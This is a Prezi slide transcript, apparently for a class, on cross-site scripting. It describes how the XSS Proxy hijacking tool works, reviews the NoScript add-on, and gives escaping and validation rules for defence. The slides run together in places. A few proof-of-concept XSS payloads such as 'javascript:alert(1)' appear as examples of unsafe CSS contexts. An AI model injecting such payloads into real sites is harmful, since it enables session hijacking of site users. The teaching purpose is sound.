Loading presentation...

Present Remotely

Send the link below via email or IM


Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.


Untitled Prezi

No description

Monica Hegde

on 14 February 2013

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of Untitled Prezi

XSS Proxy What does it need? XSS Proxy Highjacking Limitations Who uses it? How does it work? RULE 3: CSS Escape & Validation Thank you Q&A What to do? Input Validation 8 rules for protection against XSS RULE 2: URL Escape for URL parameter Values

The user must put classified data into HTTP GET parameter value
String safe = ESAPI.encoder(). encodeForURL(request.getParameter ("input" ) ); What is XSS Proxy? This tool allows XSS attacks to be fully controlled by a remote attacker.
It makes XSS attacks interactive, bi-directional, persistent and much more evil.
Attacks bypass many of the XSS mitigation methods like hidden form inputs, URL re-writing and POST methods
It functions as a web server that takes commands from the attacker via a browser and supplies the JavaScript to the victim's browser A target site with XSS vulnerability.
A victim that will run an XSS vector and have their vector hijacked by XSS proxy(victim browser).
An attack server running the XSS Proxy Perl script.(XSS Proxy attack server).
An attacker that will manage XSS Proxy and hijacked sessions (attacker browser).
An XSS vector that initializes XSS Proxy hijack. XSS proxy uses JavaScript remoting to handle the initial hijack and the ongoing victim browser looping to maintain hijack persistence.
The attacker is able to force the victim to load any other content from the same server as long as its in the same document.domain, and see the same html the victim can see. The attacker can feed the victim’s browser additional JavaSript from a remote server.
Each script call back to the attacker server has parameters in the url of the requested JS document. The attack obeys DOM access rules and cannot extend hijack control to other sites or servers until they have XSS vulnerability.
The hijack stops as soon as the victim changes window or tab.
XSS proxy can only read and forward document contents readable by JavaScript and is in HTML.
Since the images and the flash based applications are not transferable by XSS proxy they are loaded directly from the target server, which makes it traceable. NoScript What is it? NoScript is a Mozilla Add-on that protects the a user’s computer from malicious websites on the Internet.
It protects user from XSS attacks- a preemptive approach prevents exploitation of security vulnerabilities (known and even unknown!) with no loss of functionality.
It allows JavaScript, Java and other executable content to run only from trusted domains of your choice.
It operates by implementing a 'white list' of sites that you have determined as being acceptable, safe or trusted.
Other sites are considered potentially harmful and their functioning is restricted, until user adds it to the white list. Any web user browsing the internet with Mozilla Firefox can download and use this AddOn What does it do? The NoScript XSS filter mediates on the HTTP request instead of on the HTTPresponse.
Instead of altering how the response is processed by the browser, NoScript mangles the HTTP request to remove dangerous content.
For example, if the request contains a script tag, NoScript will replace the angle brackets with whitespace characters, essentially "mangling" the original request. If the server has a reflected XSS vulnerability, the server will echo the mangled script tag, which will not execute in the browser. NoScript restricts pesky advertisements, pop-up messages and malicious code built (or hacked) into web pages.
It will run silently in the background until it detects the presence of JavaScript, Adobe Flash or other script-like content. At that point NoScript will block this content and status bar will appear on the bottom of the Firefox window as follows: The NoScript status bar displays information about which objects and scripts are currently prevented from executing themselves on your system. An example of NoScript blocking a pop-up advertisement in a commercial site The Twitter web site requesting that JavaScript be enabled Since NoScript does not differentiate between malicious and real code, certain key features and functions (for instance, a tool bar) may be missing. Some web pages present content, including script-like content, from more than one website. For example, a website like www.youtube.com has three sources of scripts: To unblock scripts in these situation, one could select the Temporarily Allow [website name] option (in this instance, it would be Temporarily allow youtube.com).
For YouTube, you need only select the Temporarily allow youtube.com and Temporarily allow ytimg.com options, in order for YouTube to work.
Under no circumstances should you ever select the following option: Allow Scripts Globally (dangerous).It only takes a single injection of malicious code to compromise your on-line privacy and safety.
The NoScript plug-in has a feature called the Application Boundary Enforcer (ABE) that can be configured to disallow external websites from requesting internal resources. Free, open-source software.
Protects against malicious scripts and provides Application Boundaries Enforcer (ABE) security.
Easy to use, both for an expert and a newbie.
Blocks most annoying ads by preventing plugins or scripts being loaded by domains not in whitelist. The good The bad False positives: NoScript sanitizes outgoing requests rather than incoming responses, it cannot confirm whether the offending content actually appears in the response,let alone whether it leads to the execution of JavaScript code.
Complex policies: Covering all corner cases while avoiding false positives requires very complex detection logic. Clearly,these can be very cumbersome to maintain.
Usability Impact: NoScript's false positives normally cause more disruption to users compared to XSSAuditor. In contrast, XSSAuditor only prevents the offend-ing script from executing, and this can impact dynamically constructed elements such as advertisements, comment frames, etc, but will usually not prevent the main content of the page from being displayed. Mitigation ArchitectureInput validation
Specify output character set
Output encoding (know where your data is going) Black list testing
• Identify Input
• Analyse HTML Code
• Testing for Stored XSS
White list testing
• All input must be validated against a whitelist of acceptable value ranges. RULE 1: JavaScript Escape for JavaScript Data Values

The only safe place to put classified data into this code is inside a quoted “data value”.
document.write(escape(“sample for cross site scripting!”));
</script> The user must put classified data into a stylesheet or a style tag
Even if properly CSS escaped, some CSS contexts can never safely use this data as input
<style>selector {
 { background-url : "javascript:alert(1)"; }  // all other URLs
 { text-size: "expression(alert('XSS'))"; }   // only in IE RULE 4: Never enter RESTRICTED data except In allowed locations The only safe place to put classified data into this code is inside a quoted “data value”.
document.write(escape(“sample for cross site scripting!”));
Full transcript